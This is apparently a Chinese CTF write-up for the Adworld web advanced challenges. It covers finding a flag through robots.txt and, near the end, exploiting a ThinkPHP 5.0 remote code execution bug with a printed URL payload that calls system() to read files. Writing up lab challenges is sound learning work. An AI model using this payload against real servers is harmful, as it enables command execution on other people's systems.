[CTF]攻防世界web高手进阶区Writeup(更新ing)

baby_web

EMMMM，这就是一个签到题~

解题方法：

F12→Networks→刷新抓包→完成

看题目可以知道这道题考的是爬虫协议（robots.txt文件）的知识

打开网页，果然~

他在网页里还暗示了一下，Sometimes these files reveal the directory structure instead protecting the content from being crawled.（有时这些文件暴露了目录结构，而不是保护内容被抓取。）

好吧！我们直接打开robots.txt看看吧

好嘛~ 够直接的。。。

接下来就没啥说的，直接访问fl0g.php这个页面就可以了

到这里我们就拿到了这道题的FLAG!

推荐相关文章

打开后，提示使用的thinkphp v5.0版本

然后根据题目提示直接谷歌thinkphp rce漏洞,推荐文章《THINKPHP 5.X RCE 漏洞分析与利用总结》

然后直接构造payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27

得到FLAG!